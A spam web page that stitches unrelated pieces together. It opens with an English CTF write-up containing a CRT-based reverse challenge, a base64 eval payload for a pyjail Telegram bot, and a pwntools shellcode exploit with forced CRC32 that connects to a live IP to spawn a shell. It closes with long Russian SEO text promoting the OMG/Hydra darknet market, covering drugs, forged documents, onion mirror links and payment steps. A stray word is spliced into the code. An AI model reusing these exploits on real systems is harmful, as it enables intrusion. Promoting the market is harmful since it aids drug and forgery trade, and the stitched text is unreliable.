Как пополнить кошелек кракена

This is my write-up for recent hack you spb CTF - a CTF for newbies. I guess I'm a bit older here ahaha.Reverse 100:#include <stdio.h>#include <string.h>int main() { char buf[64]; gets(buf); int l = strlen(buf); if (l * l!= 144) return 1; unsigned int a = buf[0] | (buf[4] << 8) | (buf[8] << 16); unsigned int b = buf[1] | (buf[5] << 8) | (buf[9] << 16); unsigned int c = buf[2] | (buf[6] << 8) | (buf[10] << 16); unsigned int d = buf[3] | (buf[7] << 8) | (buf[11] << 16); if (!(((a % 3571) == 2963) && (((a % 2843) == 215)) && (((a % 30243) == 13059)))) return 2; if (!(((b % 80735) == 51964) && (((b % 8681) == 2552)) && (((b % 40624) == 30931)))) return 3; if (!(((c % 99892) == 92228) && (((c % 45629) == 1080)) && (((c % 24497) == 12651)))) return 4; if (!(((d % 54750) == 26981) && (((d % 99627) == 79040)) && (((d % 84339) == 77510)))) return 5; printf("Congratulations %s is flag\n",buf); return 0;}First of all, I think about use something like z3, or any SAT that could give me the valid number. But z3 took a lot of time, so I decided to look deeper... Yes, you could finger out there is a pattern (x % number1 == number2), so you could apply Chinese remainder theorem to get a, b, c.Reverse 200:
This is a.pyc file, which is a file contain python byte-code. As usual, for byte-code relative problems, I search for some python byte-code decompiler and found pycdc.
After decompil, you should get something like this# Source Generated with Decompyle++# File: rev200_bot_7b541a1.pyc (Python 2.7)import configimport tracebackimport refrom base64 import *from twx.botapi import TelegramBot, ReplyKeyboardMarkup, ReplyKeyboardHidesec_state = { }def process_message(bot, u):Warning: Stack history is not empty! if u.message.sender and u.message.text and u.message.chat: chat_id = u.message.chat.id user = u.message.sender.username reply_hide = ReplyKeyboardHide.create() print 'user:%s mes:%s' % (user, u.message.text) if user not in sec_state: sec_state[user] = { 'mode': 15, 'stage': 7 } cmd1 = u.message.text.encode('utf-8') a = re.findall('(\\/\\w+)\\s*(.*)', cmd1) if a: cmd = a[0][0] data = a[0][1] if cmd == '/help': bot.send_message(chat_id, 'Usage: \n\n/help - show this help\n/enter - enter secret mode\n', reply_markup = reply_hide) if cmd == '/enter': keyboard = [ [ '-7-', '-8-', '-9-'], [ '-4-', '-5-', '-6-'], [ '-1-', '-2-', '-3-'], [ '-0-']] reply_markup = ReplyKeyboardMarkup.create(keyboard) bot.send_message(chat_id, 'please enter access code', reply_markup = reply_markup).wait() if sec_state[user]['mode'] можно == 0 and cmd == '/7779317': ddd = b64decode(data) bot.send_message(chat_id, eval(ddd)) a = re.findall('-(\\d+)-', cmd1) if a: num = a[0] if int(num) == sec_state[user]['stage']: sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: bot.send_message(chat_id, 'Secret mode enabled!', reply_markup = reply_hide).wait() else: print 'NO', num, sec_state[user]['stage'] bot.send_message(chat_id, 'Invalid password!', reply_markup = reply_hide).wait() sec_state[user]['mode'] = 15 bot = TelegramBot(config.token)bot.update_bot_info().wait()print bot.usernamelast_update_id = 0while True: updates = bot.get_updates(offset = last_update_id).wait() try: for update in updates: if int(update.update_id) > int(last_update_id): last_update_id = update.update_id process_message(bot, update) continue continue except Exception: ex = None print traceback.format_exc() continue So this is a kind of chat-bot server based on Telegram.
There is eval function inside, bot.send_message(chat_id, eval(ddd)), so I need to control ddd which is a base64 decoded string from data we sent. Before that, I need to enter Secret mode by enter correct access code (0-9).
First, set sec_state[user]['mode'] = 0; First time, stage init to 7, that changed everytime you press the correct key; But if I dont remember the stage, I still could find out by bruteforce from 0 to 9, if I didn't recv incorrect message that's mean I pressed the correct one; then by use the following script, I'm able to access secret area;#coding: utf-8sec_state = { }user = "A"sec_state[user] = {'mode': 15,'stage': 7 } # bruteforce numbersec_state[user]['mode'] = 15r = []while 1: num = sec_state[user]['stage'] r.append(num) print "-%d-" % num sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: breakprint sec_state[user]['mode']Next, this is a pyjail, so I can't execute normal python command...
So, final payload is `str(().__class__.__base__.__subclasses__()[40]("flag","r").read())`or `/7779317 c3RyKCgpLl9fY2xhc3NfXy5fX2Jhc2VfXy5fX3N1YmNsYXNzZXNfXygpWzQwXSgiZmxhZyIsInIiKS5yZWFkKCkp`Reverse 300:
Let's get some fun.let reverse this (or not?), look at handler (the main function)ssize_t __cdecl handler(int fd){ ssize_t result; // [email protected] unsigned int buf; // [sp+20h] [bp-18h]@1 int v3; // [sp+24h] [bp-14h]@1 char *v4; // [sp+28h] [bp-10h]@4 int v5; // [sp+2Ch] [bp-Ch]@4 buf = 0; setuid(0x3E8u); seteuid(0x3E8u); setgid(0x3E8u); setegid(0x3E8u); result = recv(fd, &buf, 4u, 0); v3 = result; if ( result == 4 ) { result = buf; if ( buf <= 0xC8 ) { v4 = (char *)mmap(0, buf, 7, 33, -1, 0); v3 = recv(fd, v4, buf, 0); result = crc32(0, v4, buf); v5 = result; if ( result == 0xCAFEBABE ) { result = filter(v4, buf) ^ 1; if (!(_BYTE)result ) result = ((int (*)(void))v4)(); } } } return result;}So the basic idea is make result == 0xCAFEBABE, so the program will execute v4 as shellcode (function pointer), but you also need to bypass the filter function - check if contain any of 0x0, 0x1, 0x2f, 0x68, 0x73 ( so I can't use sh in plaintext)then exit; So, I did the following step:1. Find a program that can make crc32 of my shellcode equal 0xCAFEBABE
2. Make a great shellcode and Bypass filter.
By search google for everything, the answer for problem 1 is force-crc32.
Currently I'm also trying to learn some binary exploit method, write a shellcode isn't hard (hint xor), but if there is any framework that's good enough as pwntools , you shoud try at least once.
Basicaly, I import pwns and let pwntools do the rest;from pwn import *import socket, struct, telnetlibdef getCRC(data): import subprocess with open('/tmp/12', 'wb') as f: f.write(data + "123456") subprocess.check_output(['python', 'forcecrc32.py', '/tmp/12', str(len(data)+1), 'CAFEBABE']) with open('/tmp/12', 'rb') as f: data = f.read() return datadef crc32(data):# recheck import zlib return (zlib.crc32(data)) & 0xffffffffd = ""d += asm(pwnlib.shellcraft.i386.linux.dup2(4,0))d += asm(pwnlib.shellcraft.i386.linux.dup2(4,1))# i need dup2 because the program use itself as serverd += asm(pwnlib.shellcraft.i386.linux.sh())fsc = pwnlib.encoders.encoder.encode(d, '\n\x01\0\x2f\x73\x68')print len(fsc)fsc = getCRC(fsc) # it didn't contain any blocked char, so i dont need to re-generate again.print hex(crc32(fsc))#yes, i love my custom socket lib 🙁s = socket.create_connection(("78.46.101.237", 3177))s.send(p32(len(fsc)))s.send(fsc)s.send("\n")s.send("cat flag*\n") print s.recv(1024)To be continued....Related

Как пополнить кошелек кракена - Что такое кракен маркетплейс в россии

�то посещать только официальный сайт ОМГ, никаких левых сайтов с левых ссылок. Подборка Marketplace-площадок by LegalRC Площадки постоянно атакуют друг друга, возможны долгие подключения и лаги. Сохраните где-нибудь у себя в заметках данную ссылку, чтобы иметь быстрый доступ к ней и не потерять. Но основным направлением интернет магазина ОМГ является продажа психотропных препаратов таких как трава, различные колёса, всевозможные кристаллы, а так же скорость и ещё множество различных веществ. Это работает не только на просторах ОМГ ОМГ, но и так же на других заблокированных сайтах. ОМГ ОМГ - это самый большой интернет - магазин запрещенных веществ, основанный на крипто валюте, который обслуживает всех пользователей СНГ пространства. Сразу заметили разницу? Так же встречаются люди, которые могут изготовить вам любой тип документов, от дипломов о высшем образовании, паспортов любой страны, до зеркальных водительских удостоверений. На сайт ОМГ ОМГ вы можете зайти как с персонального компьютера, так и с IOS или Android устройства. На сегодняшний день основная часть магазинов расположена на территории Российской Федерации. Выбирайте любой понравившийся вам сайт, не останавливайтесь только на одном. Первый способ попасть на тёмную сторону всемирной паутины использовать Тор браузер. Площадка ОМГ ОМГ работает день и ночь, без выходных, на этой площадке не бывает дефицита товаров, так как продавцы не допускают опустошения резервов, всё время во всех городах доступно любое желаемое вещество. В этой Википедии вы найдете все необходимые вам ссылки для доступа к необходимым вам, заблокированным или запрещённым сайтам. На данный момент этот шлюз является следующим http omgomgomsbrrruob5skzizpt7nhj5ho2yzn76jq7tckjjhxkedmghead. ОМГ официальный Не будем ходить вокруг, да около. Второй это всеми любимый, но уже устаревший как способ оплаты непосредственно товара qiwi. Многие хотят воспользоваться услугами ОМГ ОМГ, но для этого нужно знать, как зайти на эту самую ОМГ, а сделать это немного сложнее, чем войти на обычный сайт светлого интернета. Магазин предлагает несколько способов подачи своего товара. Первое из них это то, что официальный сайт абсолютно безопасный. Всегда перепроверяйте ту ссылку, на которую вы переходите и тогда вы снизите шансы попасться мошенникам к нулю. Что ж, есть несколько способов для того чтобы попасть на самый популярный тёмный рынок на территории стран СНГ. Каждый день администрация ОМГ ОМГ работает над развитием их детища. Ссылка на ОМГ в тор Тор очень интересная тема для разговора, к тому же очень полезная для тех, кто хочет попасть на просторы тёмного интернета, но не знает, как это сделать. Но многих людей интересует такая интернет площадка, расположенная в тёмном интернете, как ОМГ. Например, такая интересная уловка, как замена ссылки. Настоящая ссылка зеркала только одна. Взяв реквизит у представителя магазина, вы просто переводите ему на кошелек свои средства и получаете необходимый товар. Это попросту не возможно. Для покупки этой основной валюты, прямо на сайте встроенные штатные обменные пункты, где вы можете обменять свои рубли на bit coin. Если вы выполнили всё верно, то тогда у вас всё будет прекрасно работать и вам не стоит переживать за вашу анонимность. Сейчас я перечислю небольшой список преимуществ именно официальной ОМГ ОМГ. Есть три способа обмена. Временем и надежностью он доказал свою стабильность и то что ему можно доверять, а так же на официальной ОМГ находится около 5 тысяч магазинов, что создает между ними огромную конкуренцию, что заставляет продавцов понижать цену, а это не может быть неприятно для потребителей. Иногда создаётся такое впечатление, что в мировой сети можно найти абсолютно любую информацию, как будто вся наша жизнь находится в этом интернете. При совершении покупки необходимо выбрать район, а так же почитать отзывы других покупателей. А как попасть в этот тёмный интернет знает ещё меньшее количество людей. Что особо приятно, так это различные интересные функции сайта, например можно обратиться в службу проверки качества продаваемого товара, которая, как утверждает администрация периодически, тайно от всех делает контрольные закупки с целью проверки качества, а так же для проведения химического анализа. Так же официальная ОМГ это очень удобно, потому что вам не нужно выходить из дома.

Получить ссылку на гидру (omg) и безопасно совершить покупку возможно на нашем сайте. В интернете очень часто можно наткнуться на мошенников и потерять свои личные денежные средства. Поэтому для Вашей безопасности мы разработали данный портал на котором Вы всегда можете получить доступ к магазину торговой площадки омг с помощью официальных рабочих зеркал, которые мы ежедневно обновляем и проверяем. Для совершения покупок на торговой площадке омг наш портал ежедневно посещает большое количество пользователей, для получения актуальной рабочей ссылки, достаточно просто нажать на кнопку “открыть” и безопасно совершить покупку, а если Вы впервые зашли на сайт перед приобретением товара необходимо пройти регистрацию и пополнить баланс. Ваша безопасность наша важнейшая задача, которую мы с гордостью выполняем.Ссылка на ОМГ сайт зеркало – omg2web.cmСсылка на ОМГ через Tor: omgrulqno4hoio.onionСсылка на гидруПолучить ссылку на гидру и безопасно совершить покупку возможно на нашем сайте. В интернете очень часто можно наткнуться на мошенников и потерять свои личные денежные средства. Поэтому для Вашей безопасности мы разработали данный портал на котором Вы всегда можете получить доступ к магазину торговой площадки омг с помощью официальных рабочих зеркал, которые мы ежедневно обновляем и проверяем. Для совершения покупок на торговой площадке омг наш портал ежедневно посещает большое количество пользователей, для получения актуальной рабочей ссылки, достаточно просто нажать на кнопку “открыть” и безопасно совершить покупку, а если Вы впервые зашли на сайт перед приобретением товара необходимо пройти регистрацию и пополнить баланс. Ваша безопасность наша важнейшая задача, которую мы с гордостью выполняем.Ссылка на ОМГ сайт зеркало – omg2web.cmСсылка на ОМГ через Tor: omgrulqno4hoio.onionОМГ онионОМГ онион это самая масштабная торговая площадка запрещенных товаров в России и странах СНГ. Здесь Вы можете приобрети такие товары как марихуана, различные стимуляторы, всевозможные эйфоретики, психоделические препараты, энетеогены, экстази, диссоциативы, опиаты, химические реактивы и конструкторы, различные аптечные препараты, также возможно анонимно обналичить Ваши биткоины и приобрести всевозможные виды документов разных стран. На торговой площадке омг совершается огромное количество заказов ежедневно, сотни тысяч довольных клиентов и  положительных отзывов. Наш портал помогает всем клиентам получить безопасный доступ к торговой площадке omg и ее товарам и услугам. ОМГ онион доступна в тор браузере, ссылку на актуальное рабочее зеркало Вы можете скопировать выше, для этого достаточно нажать на кнопку “СКОПИРОВАТЬ”.ОМГ ссылкаВоспользоваться торговой площадкой omg onion непросто. Специально для Вас мы подготовили все возможные варианты упрощения данной задачи. Разработанное нами всегда рабочая омг ссылка  позволит легко и быстро открыть сайт в обычных браузерах, таких как Google Chrome, Яндекс.Браузер, Opera и т.д. Для перехода достаточно кликнуть на кнопку “ОТКРЫТЬ” и воспользоваться услугами торговой площадки omg. С целью защиты пользователя от обмана и предотвращения перехода по фишинговому адресу, мы указали ссылку на торговую площадку ОМГ, с возможностью ее копирования (путем нажатия кнопки “СКОПИРОВАТЬ”) и использования в анонимном Tor браузере. Наша миссия упростить пользователям доступ к гидре и тем самым позволить площадке развиваться и процветать, мы за свободный интернет без политических ограничений.На тему: ОМГ сайт  omg2web не работаетОМГ торОМГ тор доступна в тор Браузер, тор браузер это свободное и открытое программное обеспечение для реализации второго поколения так называемой луковой маршрутизации. Это система прокси-серверов последовательно связанных между собой в длинную цепочку интернет соединений, позволяющая устанавливать анонимное не оставляющее следов сетевое соединение. Рассматривается как анонимная сеть виртуальных туннелей (VPN), предоставляющая передачу данных в зашифрованном виде. Свою актуальность получил как инструмент для “свободного” интернет-серфинга, в частности посещения заблокированных сайтов таких как ОМГ и аналогичных ресурсов из теневого интернета (Darknet). Используя тор браузер Вы остаетесь анонимными только до того времени пока не начнете сохранять свои личные данные, не нужно забывать о своей безопасности, поэтому мы рекомендуем Вам не сохранять пароли и иную информацию, используя которую злоумышленники смогут Вам навредить, чистите кеш, куки и удаляйте историю.ОМГ официальный сайтОМГ официальный сайт это торговая площадка различных товаров определенной тематики. Сайт работает с 2015 года и на сегодняшний день активно развивается. Основная валюта – криптовалюта BitCoin. Специально для покупки данной валюты на сайте работают штатные обменники. Купить или обменять BitCoin можно при помощи раздела “Баланс” в личном кабинете. omg предлагает два варианта получения товаров: первый – это клад (закладки, тайник, магнит, прикоп); второй – доставка по всей России (почта, курьерские службы, транспортные компании). Огромное количество проверенных магазинов успешно осуществляют свои продажи на протяжении нескольких лет. На сайте имеется система отзывов, с помощью которой Вы можете убедиться в добросовестности продавца. Торговая площадка omg адаптирована под любые устройства. В связи с блокировкой ссылки omg onion периодически проводятся обновления зеркал для обхода блокировки. Вслед за новыми зеркалами появляются и “фейки” торговой площадки omg. Обычно фейк идентичен официальному сайту омг, но зайти в личный кабинет не получится, т.к. это фейк и его задача сбор логинов и паролей. Всегда проверяйте ссылка на гидру по которой Вы переходите, а лучше используйте актуальные ссылки на гидру представленные на нашем сайте и Ваши данные не попадут в руки мошенников.На тему: ОМГ сайт  ОМГ – что это за сайт?ОМГ онион сайтОМГ онион это сайт из сети тор, созданный для анонимного и безопасного серфинга в теневом интернете, в сети тор насчитается порядка миллиона сайтов различной тематика в основном это интернет-магазины и форумы, встречаются и сайты с очень сомнительной деятельностью касаться их мы не будем (если они Вам инетересно можете воспользоваться специальной поисковой системой DuckDuckGo, она по умолчанию встроена в TOR браузер), сайт омг онион доступен по актуальному зеркалу представленному на нашем сайте. Для того чтобы перейти на гидру в зоне онион Вам понадобится тор браузер т.к. домены в зоне onion специально созданы для анонимной сети TOR, нажмите на кнопку “скопировать” (она расположена выше) далее вставьте ссылку в адресную строку в тор браузере и перейдите на сайт интернет-магазина омг, после совершения покупки не забудьте почистить браузер, удачных покупок.Как зайти на гидруКак зайти на гидру? Этим вопросом задаются все пользователи гидры, каждый день приходится искать рабочее зеркало гидры т.к. изо дня в день зеркала банятся правительством и доступа к ресурсу нет, использовать VPN сложно и дорого, тор на английском языке что тоже не всем подходит. Специально для максимального облегчения этой задачи мы разработали наш сайт. Для открытия гидры Вам нужно перейти по актуальному рабочему зеркалу указанному выше или либо скопировать ссылку для тор браузера которая также указана на нашем сайте и открыть ее в тор браузере, после чего пройти регистрацию, пополнить баланс и радоваться покупкам. Не забывайте помогать развитию портала делитесь нашим ресурсом с друзьями и знакомыми. Давайте вместе ответим на этот вопрос “как зайти на гидру”?